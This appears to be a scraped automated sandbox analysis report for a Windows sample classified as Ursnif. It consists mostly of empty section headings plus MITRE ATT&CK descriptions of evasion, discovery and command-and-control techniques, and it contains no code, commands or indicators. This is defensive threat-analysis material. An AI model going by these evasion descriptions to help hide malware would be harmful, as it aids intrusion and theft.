Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report o4c8AUtX1g

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Privilege Escalation:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

UDP Packets

DNS Queries

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre